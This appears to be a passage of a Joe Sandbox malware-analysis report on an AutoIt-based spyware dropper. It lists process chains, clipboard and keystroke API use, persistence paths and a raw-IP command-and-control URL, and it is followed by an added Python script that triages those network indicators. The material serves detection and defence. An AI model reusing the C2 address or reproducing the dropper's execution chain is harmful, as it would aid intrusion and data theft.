                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000002.2078930988.0000000000E65000.00000002.00000001.01000000.0000000E.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000002.2216834063.0000000000E65000.00000002.00000001.01000000.0000000E.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000000.2185326660.0000000000E65000.00000002.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: OpenWith.exe, 0000000F.00000002.2944848789.000000000327C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e8
                Source: OpenWith.exe, 0000000F.00000002.2944848789.000000000327C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e8(
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1836340728.000000000113C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1835610610.000000000114A000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3, 00000007.00000003.1834362652.0000000001149000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.1997082849.0000000001837000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.globalsign.com/repository/0
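The network strings above are of three kinds: GlobalSign CRL, OCSP and CA-certificate URLs that come from a code-signing certificate chain, the AutoIt project URL that every AutoIt-compiled binary carries, and one raw-IP HTTPS URL on port 5151 whose host is the same 51.75.171.9 address the sandbox saw contacted without any DNS query. The Python below is an added triage example written for this page, not part of the Joe Sandbox output: it reads the report's own rows (copied here as constructed input), groups the strings by host and port, and separates expected noise from the corroborated C2 candidate. The allowlist of certificate-infrastructure and AutoIt hosts is this example's own assumption.

```python
"""Triage of the network indicators listed in the report.

Added example written for this page, not part of the Joe Sandbox output.
Assumption: EXPECTED_NOISE_HOSTS is this example's allowlist of certificate
infrastructure and AutoIt project hosts.
"""
import re
from urllib.parse import urlsplit

# Constructed input: the report's own observations, reduced to the two row
# types this script understands.
REPORT_LINES = [
    "TCP traffic detected without corresponding DNS query: 51.75.171.9",
    "String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G",
    "String found in binary or memory: http://ocsp2.globalsign.com/rootr306",
    "String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0",
    "String found in binary or memory: http://www.autoitscript.com/autoit3/J",
    "String found in binary or memory: https://www.autoitscript.com/autoit3/",
    "String found in binary or memory: https://www.globalsign.com/repository/0",
    "String found in binary or memory: https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e8",
    "String found in binary or memory: https://51.75.171.9:5151/9640d96bbead45f349f3ab9/nvkjh5gq.0x2e8(",
]

# Hosts expected in any GlobalSign-signed or AutoIt-compiled binary: CRL, OCSP
# and CA-certificate distribution points from the certificate chain, and the
# AutoIt runtime's own URL. They are not C2 and not worth blocking.
EXPECTED_NOISE_HOSTS = {
    "crl.globalsign.com", "ocsp.globalsign.com", "ocsp2.globalsign.com",
    "secure.globalsign.com", "www.globalsign.com", "www.autoitscript.com",
}

URL_RE = re.compile(r"https?://\S+")
IPV4_RE = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")
NO_DNS_PREFIX = "TCP traffic detected without corresponding DNS query:"
STRING_PREFIX = "String found in binary or memory:"


def parse_report(lines):
    """Return (URL strings, IPs contacted without a preceding DNS lookup)."""
    urls, no_dns_ips = [], set()
    for line in lines:
        line = line.strip()
        if line.startswith(NO_DNS_PREFIX):
            m = IPV4_RE.search(line[len(NO_DNS_PREFIX):])
            if m:
                no_dns_ips.add(m.group(0))
        elif line.startswith(STRING_PREFIX):
            m = URL_RE.search(line)
            if m:
                urls.append(m.group(0))
    return urls, no_dns_ips


def triage(lines):
    """Group URL strings by host:port and attach a verdict to each group.

    Strings carved from memory often drag along whatever bytes followed them
    (the "0G" after a CRL URL is DER data from the certificate, the "(" after
    the C2 URL is an adjacent byte), so grouping is done on the network
    location rather than on the exact string.
    """
    urls, no_dns_ips = parse_report(lines)
    findings = {}
    for url in urls:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        default_port = 443 if parts.scheme == "https" else 80
        entry = findings.setdefault(parts.netloc.lower(), {
            "host": host,
            "strings": [],
            "literal_ip": IPV4_RE.fullmatch(host) is not None,
            "non_default_port": parts.port not in (None, default_port),
            "seen_without_dns": host in no_dns_ips,
        })
        entry["strings"].append(url)
    for entry in findings.values():
        if entry["host"] in EXPECTED_NOISE_HOSTS:
            entry["verdict"] = "noise"
        elif entry["literal_ip"] or entry["seen_without_dns"]:
            # A hard-coded IP that the sandbox also saw contacted without DNS
            # is the strongest network indicator in the report.
            entry["verdict"] = "c2_candidate"
        else:
            entry["verdict"] = "review"
    return findings


def c2_iocs(findings):
    """host:port values worth blocking or hunting for, sorted."""
    return sorted(k for k, v in findings.items() if v["verdict"] == "c2_candidate")


if __name__ == "__main__":
    result = triage(REPORT_LINES)
    for netloc, entry in sorted(result.items()):
        print(f"{entry['verdict']:13s} {netloc}  ({len(entry['strings'])} string(s))")
    print("block:", ", ".join(c2_iocs(result)))
```

The allowlist is deliberately narrow: a hostname that is neither a literal IP nor on the list lands in `review` instead of being auto-cleared, and only an indicator corroborated by the connection rows (or hard-coded as an IP) is promoted to `c2_candidate`.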
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_003EF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_003EF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe | Code function: 16_2_00E0F6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_003DA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
                Source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: DirectInput8Create (memstr_7d31fd25-6)
                Source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: GetRawInputData (memstr_98c403a2-e)
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_00409ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe | Code function: 16_2_00E29ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                Source: Yara match | File source: 15.3.OpenWith.exe.59c0000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 15.3.OpenWith.exe.57a0000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: OpenWith.exe PID: 7980, type: MEMORYSTR

                System Summary

                Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 17_2_066CA41B GetCurrentProcess,NtQueryInformationProcess
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code function: 17_2_066C7895 NtQueryInformationProcess
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | Code function: 0_2_00B09B5C _wcslen,CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_003D1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_003DF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe | Code function: 16_2_00DFF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | Code functions: 0_2_00B1355D, 0_2_00B1B76F, 0_2_00B0BF3D, 0_2_00B2C0D6, 0_2_00B1A008, 0_2_00B292D0, 0_2_00B1A222, 0_2_00B15214, 0_2_00B1C27F, 0_2_00B34360, 0_2_00B386D2, 0_2_00B146CF, 0_2_00B048AA, 0_2_00B3480E, 0_2_00B05AFE, 0_2_00B1ABC8, 0_2_00B07CBA, 0_2_00B1BC05, 0_2_00B03D9D, 0_2_00B14D32, 0_2_00B2BEA7, 0_2_00B05F39, 0_2_00B15F0B
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code functions: 7_2_00398037, 7_2_00392007, 7_2_0038E0BE, 7_2_0037E1A0, 7_2_0037225D, 7_2_003AA28E, 7_2_003922C2, 7_2_0038C59E, 7_2_003FC7A3, 7_2_003AE89F, 7_2_003E291A, 7_2_003A6AFB, 7_2_003D8B27, 7_2_0039CE30, 7_2_003A7169, 7_2_004051D2, 7_2_00379240, 7_2_00379499, 7_2_00391724, 7_2_00391A96, 7_2_00379B60, 7_2_00397BAB, 7_2_00391D40, 7_2_00397DDA
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code functions: 14_2_01358250, 14_2_01355158, 14_2_01355148, 14_2_01358240, 14_2_01357F2C
                Source: C:\Windows\SysWOW64\OpenWith.exe | Code functions: 15_2_05A48419, 15_2_05A5FC7D, 15_2_05A4871F, 15_2_05A5C776, 15_2_05A5BE5A, 15_2_05A5C1DA, 15_2_05A5E833, 15_2_05A57815, 15_2_05A57BA2, 15_2_05A5BBAF, 15_2_05A52340
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe | Code functions: 16_2_00DAE0BE, 16_2_00DB2007, 16_2_00DB8037, 16_2_00D9E1A0, 16_2_00DB22C2, 16_2_00DCA28E, 16_2_00D9225D, 16_2_00DAC59E, 16_2_00E1C7A3, 16_2_00DCE89F, 16_2_00E0291A, 16_2_00DC6AFB, 16_2_00DF8B27, 16_2_00DBCE30, 16_2_00E251D2, 16_2_00DC7169, 16_2_00D99240, 16_2_00D99499, 16_2_00DB1724, 16_2_00DB1A96, 16_2_00DB7BAB, 16_2_00D99B60, 16_2_00DB7DDA, 16_2_00DB1D40
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Code functions: 17_2_01BF8250, 17_2_01BF5158, 17_2_01BF5148, 17_2_01BF8240, 17_2_066C3E3D, 17_2_066C7E1D, 17_2_06A62E20, 17_2_066C9BC4, 17_2_066D1B8C, 17_2_066D1C22, 17_2_066C3000
                Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: String function: 00390DC0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: String function: 0038FD60 appears 31 times
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe | Code function: String function: 00DAFD60 appears 31 times
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe | Code function: String function: 00DB0DC0 appears 46 times
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | Code function: String function: 00B257D8 appears 66 times
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | Code function: String function: 00B26630 appears 31 times
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | Code function: String function: 00B257A5 appears 34 times
                Source: ngPebbPhbp.exe, 00000000.00000003.1732897348.0000000007855000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAutoIt3.exeB vs ngPebbPhbp.exe
                Source: ngPebbPhbp.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@31/48@0/1
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | Code function: 0_2_00B0932C GetLastError,FormatMessageW,_wcslen,LocalFree
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_003D194F AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_003D1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe | Code function: 16_2_00DF194F AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe | Code function: 16_2_00DF1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_003E5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_003DDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Code function: 7_2_003F4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | Code function: 0_2_00B1EBD3 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | File created: C:\Users\user\AppData\Roaming\wlnk
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
                Source: C:\Windows\SysWOW64\OpenWith.exe | Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | Command line argument: sfxname (0_2_00B2454A)
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | Command line argument: sfxstime (0_2_00B2454A)
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | Command line argument: STARTDLG (0_2_00B2454A)
                Source: ngPebbPhbp.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\OpenWith.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor (reported 2 times)
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | File read: C:\Windows\win.ini
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: ngPebbPhbp.exe | ReversingLabs: Detection: 55%
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | File read: C:\Users\user\Desktop\ngPebbPhbp.exe
                Source: unknown | Process created: C:\Users\user\Desktop\ngPebbPhbp.exe "C:\Users\user\Desktop\ngPebbPhbp.exe"
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\rmxb.vbe"
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c qwlvpmrupf.mp3 tnlupe.mp3
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 qwlvpmrupf.mp3 tnlupe.mp3
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe "C:\Users\user\AppData\Roaming\wlnk\QWLVPM~1.EXE" C:\Users\user\AppData\Roaming\wlnk\tnlupe.mp3
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: dxgidebug.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: sfc_os.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: dwmapi.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: riched20.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: usp10.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: msls31.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: textinputframework.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: coreuicomponents.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: coremessaging.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: ntmarta.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: policymanager.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: msvcp110_win.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: slc.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: onecorecommonproxystub.dll
